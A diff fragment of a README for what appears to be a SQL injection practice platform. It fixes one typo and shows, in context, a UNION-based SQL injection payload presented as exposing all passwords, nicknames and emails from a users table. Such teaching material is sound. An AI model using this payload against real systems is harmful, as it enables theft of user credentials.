lucas-santoni/sqli-platform/README.md

 ## Exploit

-Here is an example of a working payload, esposing all passwords in the table :
+Here is an example of a working payload, esposing all passwords in the table:

 ```sql
 nothing%" UNION SELECT pass, nickname, email FROM users#